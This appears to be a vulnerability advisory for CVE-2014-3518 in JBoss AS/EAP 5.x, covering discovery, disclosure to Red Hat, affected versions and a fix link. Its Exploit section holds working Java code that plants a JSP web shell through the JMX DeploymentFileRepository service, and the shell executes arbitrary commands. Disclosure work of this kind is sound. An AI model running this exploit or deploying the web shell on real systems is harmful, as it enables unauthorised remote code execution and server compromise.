CVE-2014-3518 JBoss EAP/AS 5: Remote code execution

Overview

JBoss Application Server (JBoss AS) is an open-source, cross-platform Java application server developed by JBoss, a division of Red Hat Inc. JBoss AS is an open-source implementation of Java 2 Enterprise Edition (J2EE) that is used for implementing Java applications and other Web-based applications and software.

JBoss AS is released through Lesser General Public License. The JBoss.org community provides free support for this application server.

We have discovered that default installations of JBoss AS 5.x products prone to remote code execution attacks.

Story and description

Meanwhile we were investigating one of our customer's JBoss security, we figured out even RedHat's proposed solution on https://access.redhat.com/site/solutions/30744 has been made, there is still a way to invoke DeploymentFileRepository service through JMXConsole over JNDI.

We were also aware of an existence of a worm which uses CVE-2010-0738 but if attackers knew this way too, they would cause too much trouble in JBoss 4.x and 5.x installations.

We reported this issue to Redhat on 23 June 2014 and they released their report on related Redhat Customer Portal page on July.

Exploit

To test on your servers, you can use sample code below which would create jspshell.jsp on remote JSP server to execute arbitrary commands remotely.

String urlStr = "service:jmx:rmi://TARGET_HOST/jndi/rmi://TARGET_HOST:1090/jmxconnector";
JMXServiceURL url = new JMXServiceURL(urlStr);
JMXConnector conn = JMXConnectorFactory.connect(url, null);
MBeanServerConnection server = conn.getMBeanServerConnection();
String shellFileName = "jspshell";
String shellFileExtension=".jsp";
String warFileName = "shell";
String warFileExtension = ".war";
String jspShell = "<%@ page import=\"java.util.*,java.io.*\"%><%if (request.getParameter(\"sh\") != null) {out.println(\"Command: \" +request.getParameter(\"sh\") + \"\");Process p =Runtime.getRuntime().exec(request.getParameter(\"sh\"));OutputStream os = p.getOutputStream();InputStream in = p.getInputStream();DataInputStream dis = new DataInputStream(in);String disr = dis.readLine();while ( disr != null ) {out.println(disr);disr = dis.readLine();}}%>";
server.invoke(new ObjectName("jboss.admin:service=DeploymentFileRepository"), "store", 
        new Object[]{warFileName+warFileExtension,shellFileName,shellFileExtension,jspShell,true},
        new String[]{"java.lang.String","java.lang.String","java.lang.String","java.lang.String","boolean"});

Affected versions

Prior to Red Hat JBoss Enterprise Application Platform (JEAP) 5.2.0, Red Hat JBoss BRMS 5.3.1, Red Hat JBoss Portal Platform 5.2.2, and Red Hat JBoss SOA Platform 5.3.1

Fixes

Take a look at https://access.redhat.com/solutions/1120423